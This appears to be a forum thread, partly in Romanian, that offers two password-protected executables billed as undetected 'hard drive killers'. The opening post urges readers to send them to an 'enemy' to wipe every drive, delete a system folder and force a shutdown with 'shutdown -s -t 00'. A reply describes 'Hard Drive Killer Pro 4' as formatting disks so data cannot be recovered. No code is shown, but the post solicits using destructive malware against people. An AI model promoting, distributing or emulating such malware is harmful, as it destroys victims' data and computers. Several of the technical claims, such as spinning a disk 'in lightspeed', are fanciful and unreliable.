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Hard Drive Killers

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Do not run self the 2 harddrive killers, send it to someone.

have you an annoying enemy? if so, send him one of the 2 undetected harddrive killers.

the Advanced Batch Helper.exe is a Multiple Hard Drive Killer and kills the victims harddrive forever, this fine exe lets rotate the enemys harddrive disc in lightspeed. it will kill alldrive=c d e f g h i j k l m n o p q r s t u v w x y z and all removable media drives too.

the Setup.exe will delete the victims or your enemys



%SystemRoot%Cursor s





and it will

shutdown -s -t 00


the victims pc

the 2 files are completly undetected by jotti's online virus scanner.

pass for the file is key

do not abuse this files.




hey ink nu ma numesc hacker invat.da uite ce scrie si u .fix la inceput"the Advanced Batch Helper.exe is a Multiple Hard Drive Killer and kills the victims harddrive forever,"


bah hacker nu oi fi , dar macar esentialu trebuie sa-l stii :P

Inveti , nu zice nimeni !!!

{Nu tot ce zboara se mananca } { daca merge foarte frumos , incearca'l tu , nu la tine pe hard , si zi-ne si noua }


nu va jucati cu focul

| Hard Drive Killer Pro 4 | = Cel mai de temut program. H.D.K. pro 4 a fost realizat pentru a distruge toate informatiile stocate pe hard disk formatand-ul. Odata executat acest program infecteaza sau sterge toate fisierele iar apoi restarteaza P.C-ul. Dupa restartare programul formateaza hard disk-ul in cateva secunde intr-un fel in care datele nu mai pot fi recuperate. Acest program, desi nu este realizat sa faca acest lucru, poate chiar sa si defecteze hard disk-ul.

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